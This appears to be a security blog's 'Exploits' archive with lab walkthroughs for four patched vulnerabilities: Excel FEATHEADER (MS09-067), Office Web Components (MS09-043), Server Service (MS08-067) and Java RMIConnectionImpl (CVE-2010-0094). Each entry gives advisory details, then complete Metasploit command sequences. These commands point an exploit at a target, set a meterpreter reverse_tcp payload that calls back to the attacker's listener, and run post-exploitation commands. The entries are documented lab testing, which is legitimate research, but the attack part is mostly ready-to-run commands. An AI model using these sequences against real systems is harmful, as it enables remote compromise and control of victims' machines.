Category Archives: Exploits

All my posts regarding exploits, PoCs and 0days.

MS09-067 : Microsoft Excel Malformed FEATHEADER Record Vulnerability

Timeline :

Vulnerability reported to Microsoft by ZDI the 2009-10-20
Microsoft patch “KB973475” provided the 2009-11-10
Metasploit PoC provided by hdm the 2010-02-12
Exploit-DB PoC provided by anonymous the 2010-08-21

PoC provided by :

Sean Larsson
jduck

Reference(s) :

CVE-2009-3129
MS09-067

Affected version(s) :

Microsoft Office XP Service Pack 3
Microsoft Office 2003 Service Pack 3
2007 Microsoft Office System SP1 & SP2
Microsoft Office 2004 for Mac
Microsoft Office 2008 for Mac
Microsoft Office Excel Viewer SP1 & SP2
Microsoft Office Excel Viewer 2003 SP3

Tested on Windows XP SP3 with :

Office Excel 2003 SP3 before KB973475

Description :

This module exploits a vulnerability in the handling of the FEATHEADER record by Microsoft Excel. Revisions of Office XP and later prior to the release of the MS09-067 bulletin are vulnerable. When processing a FEATHEADER (Shared Feature) record, Microsoft used a data structure from the file to calculate a pointer offset without doing proper validation. Attacker supplied data is then used to calculate the location of an object, and in turn a virtual function call. This results in arbitrary code exection. NOTE: On some versions of Office, the user will need to dismiss a warning dialog prior to the payload executing.

Commands :

use exploit/windows/fileformat/ms09_067_exce­l_featheader
set OUTPUTPATH /home/eromang
set TARGET 2
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

sessions -i 1
sysinfo
getuid
ipconfig

MS09-043 : Microsoft OWC Spreadsheet msDataSourceObject Memory Corruption

Timeline :

Vulnerability reported to Microsoft by ZDI the 2007-03-19
Metasploit PoC provided by hdm the 2009-07-13
Milw0rm PoC provided by anonymous the 2009-07-16
Microsoft patch “KB947319” provided the 2009-08-11

PoC provided by :

unknown
hdm
Ahmed Obied
DSR

Reference(s) :

CVE-2009-1136
MS09-043

Affected version(s) :

Microsoft Office XP Service Pack 3
Microsoft Office 2003 Service Pack 3
Microsoft Office 2000 Web Components SP3
Microsoft Office XP Web Components SP3
Microsoft Office 2003 Web Components SP3
Microsoft Office 2003 Web Components SP1 for the 2007 Microsoft Office System
Microsoft Internet Security and Acceleration Server 2004 Standard Edition SP3
Microsoft Internet Security and Acceleration Server 2004 Enterprise Edition SP3
Microsoft Internet Security and Acceleration Server 2006 Standard Edition SP1
Microsoft Internet Security and Acceleration Server 2006 Enterprise Edition SP1
Microsoft BizTalk Server 2002
Microsoft Visual Studio .NET 2003 SP1
Microsoft Office Small Business Accounting 2006

Tested on Windows XP SP3 with :

Office 2003 SP3 before KB947319

Description :

This module exploits a memory corruption vulnerability within versions 10 and 11 of the Office Web Component Spreadsheet ActiveX control. This module was based on an exploit found in the wild.

Commands :

use exploit/windows/browser/ms09_043_owc_msd­so
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

MS08-067 : Microsoft Server Service Relative Path Stack Corruption

Timeline :

Milw0rm PoC provided by stephen lawler the 2008-10-23
Metasploit PoC provided by hdm the 2009-10-28
Microsoft patch “KB958644” provided the 2008-10-23

PoC provided by :

Brett Moore
hdm

Reference(s) :

CVE-2008-4250
MS08-067

Affected version(s) :

Microsoft Windows 2000 SP4
Windows XP SP2 & SP3
Windows XP Professional x64 Edition
Windows XP Professional x64 Edition SP2
Windows Server 2003 SP1 & SP2
Windows Server 2003 x64 Edition
Windows Server 2003 x64 Edition SP2
Windows Vista and Windows Vista SP1
Windows Vista x64 Edition and Windows Vista x64 Edition SP1
Windows Server 2008 for 32-bit Systems
Windows Server 2008 for x64-based Systems

Tested on Windows XP SP3 before KB958644

Description :

This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service. This module is capable of bypassing NX on some operating systems and service packs. The correct target must be used to prevent the Server Service (along with a dozen others in the same process) from crashing. Windows XP targets seem to handle multiple successful exploitation events, but 2003 targets will often crash or hang on subsequent attempts. This is just the first version of this module, full support for NX bypass on 2003, along with other platforms, is still in development.

Commands :

nmap 192.168.178.41
use exploit/windows/smb/ms08_067_netapi
set RHOST 192.168.178.41
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

CVE-2010-0094 : Java RMIConnectionImpl Deserialization Privilege Escalation Exploit

Timeline :

Vulnerability reported to Oracle by ZDI the 2009-10-21
Coordinated public release of advisory the 2010-04-05
Metasploit PoC provided by hdm the 2010-09-08

    PoC provided by :

Sami Koivu
Matthias Kaiser
egypt

    Reference(s) :

CVE-2010-0094
ZDI-10-051

    Affected version(s) :

Java 6 Standard Edition prior to update 19
Java 5 Standard Edition prior to update 23

    Tested on Windows XP SP3 with :

    Java 6 Standard Edition Update 18

    Description :

This module exploits a vulnerability in the Java Runtime Environment that allows to deserialize a MarshalledObject containing a custom classloader under a privileged context. The vulnerability affects version 6 prior to update 19 and version 5 prior to update 23.

    Commands :

use multi/browser/java_rmi_connection_impl
set SRVHOST 192.168.178.21
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig